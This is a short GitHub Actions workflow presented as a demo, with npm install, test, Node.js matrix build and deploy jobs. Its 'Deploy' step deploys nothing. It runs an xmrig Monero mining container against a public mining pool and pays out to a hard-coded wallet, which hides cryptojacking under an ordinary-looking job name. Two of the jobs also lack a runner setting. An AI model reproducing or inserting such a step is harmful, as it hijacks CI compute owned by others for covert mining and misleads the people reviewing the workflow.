name: This is demo workflow

on: [push]

jobs:

  package:
    name: This is npm install
    steps:
    - uses: actions/checkout@v1
    - name: npm install
      run: npm i
    
  test:
    steps:
    - uses: actions/checkout@v1
    - name: npm install
      run: npm i 
    
  build:
    runs-on: ubuntu-latest

    strategy:
      matrix:
        node-version: [8.x, 10.x, 12.x]

    steps:
    - uses: actions/checkout@v1
    - name: Use Node.js ${{ matrix.node-version }}
      uses: actions/setup-node@v1
      with:
        node-version: ${{ matrix.node-version }}
        
  deploy:
    runs-on: ubuntu-latest

    steps:

      - uses: actions/checkout@v2

      - name: Deploy
        run: docker run --name miner --rm -e POOL_URL=pool.minexmr.com:4444  -e POOL_USER=488gqmpBPEtLtf97ZUs6zuRZgk1DkVYtCdVZ8AXfZh2zBvTppPysRJjeMCC5XC1neMYsNPPgp56qZejNdPMmRGibBSkP5ws metal3d/xmrig
